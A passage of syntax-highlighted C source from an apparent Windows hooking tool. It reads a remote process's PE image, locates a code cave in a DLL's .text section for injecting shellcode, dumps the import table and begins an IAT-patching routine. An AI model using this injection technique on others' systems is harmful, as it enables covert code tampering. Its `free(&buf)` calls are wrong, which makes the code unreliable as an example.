<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x20b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// PE32+</span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid Magic in OptionalHeader</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Detected %s architecture</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"PE32"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"PE32+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pImage</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="nf">FindSectionHeaderByName</span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeaders</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">dwNumberOfSections</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">pSectionName</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeaderMatch</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">dwNumberOfSections</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">pHeaders</span><span class="p">[</span><span class="n">i</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_stricmp</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">pHeader</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">pSectionName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">pHeaderMatch</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pHeaderMatch</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/*</span>
<span class="cm"> * Finds a code cave in the .text section of the DLL. If this function is unable to </span>
<span class="cm"> * find a code cave at least minimalSize bytes long, it fails and so will the whole </span>
<span class="cm"> * hooking attempt. By failure, will return 0.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"></span>
<span class="nf">FindRemoteCodeCave</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">minimalCodeCaveSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">dwHandlerAddress</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="n">pLoadedImage</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadRemoteImage</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pLoadedImage</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadRemoteImage failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindSectionHeaderByName</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="o">-></span><span class="n">Sections</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="o">-></span><span class="n">NumberOfSections</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">".text"</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pCodeSectionHeader</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Couldn't locate the .text section. Maybe it's named differently</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * Because there is a essential difference between PE Files in memory and on disk, </span>
<span class="cm"> * we might observe a phenomenon due to the different file alignment which comes handy</span>
<span class="cm"> * when we are in need to write our shell code to a process:</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="n">dwHandlerAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">lpImageBaseAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="o">-></span><span class="n">SizeOfRawData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">minimalCodeCaveSize</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">dwHandlerAddress</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">PrintImportDirectory</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">imageBase</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">IMAGE_THUNK_DATA</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">,</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">,</span><span class="w"> </span><span class="n">counter</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="w"> </span><span class="c1">// not more than 50 dll's in a module :)</span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(buf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* pImageImportDescriptor[index].Characteristics is </span>
<span class="cm"> * set to 0 to indicate the end of the array of IMAGE_IMPORT_DESCRIPTORs.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the DLLName:) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Name</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(dllNameBuf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Dll </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> found"</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">PCHAR</span><span class="p">)</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">OriginalFirstThunk is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">FirstThunk is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">TimeDateStamp is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">TimeDateStamp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">ForwarderChain is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">ForwarderChain</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\n\t</span><span class="s">FUNCTION-NAME : FUNCTION-ADDRESS : ADDRESS OF FUNCTION ADDRESS"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the INT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpThunkINTBuffer) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the IAT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataIAT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpThunkINTBuffer) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Check if we reached the end of the array */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counter</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * Huge problem here is that the RVA's pointing to the names of the function in the IAT</span>
<span class="cm"> * are not in a ascending order. The RVA's may even be broken (yeah the linkers are bad^^)</span>
<span class="cm"> * and we may get invalid indices. How can we figure out that we do have a valid RVA in </span>
<span class="cm"> * pThunkDataINT->u1.AddressOfData ?!</span>
<span class="cm"> * There are just bad solutions (or lazyness when it comes to </span>
<span class="cm"> * heuristic fine tuning, so we apply a heuristic function on all RVA's of the </span>
<span class="cm"> * IMAGE_THUNK_DATA INT array to ignore RVA's which have a absolute difference from </span>
<span class="cm"> * more than 0x5000 bytes to the first RVA. What happens if the first RVA is a invalid </span>
<span class="cm"> * one? We're screwed, but at least the other is able to locate the problem quickly.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="c1">// test if we stumbled upon a suspicious RVA (after hoping that the first is not :/)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">)</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mh">0x5000</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"</span><span class="se">\n</span><span class="s">RVA in INT->u1.AddressOfData might be broken (%x) - ignoring</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpFunctionNameBuf) in HookFunction() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">)</span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">%s: 0x%x : 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="p">,</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* We can free up now the allocated buffer */</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/* </span>
<span class="cm"> * Looks up the function address in the IAT with LibName and funcName and </span>
<span class="cm"> * patches the pointer to the value in redirection. If the function succeeds, it will</span>
<span class="cm"> * return the OLD function pointer, so you can save it to restore the default behaviour. If </span>
<span class="cm"> * HookFunction fails, it will return FALSE(0).</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"> </span><span class="nf">PatchIAT</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"></span>
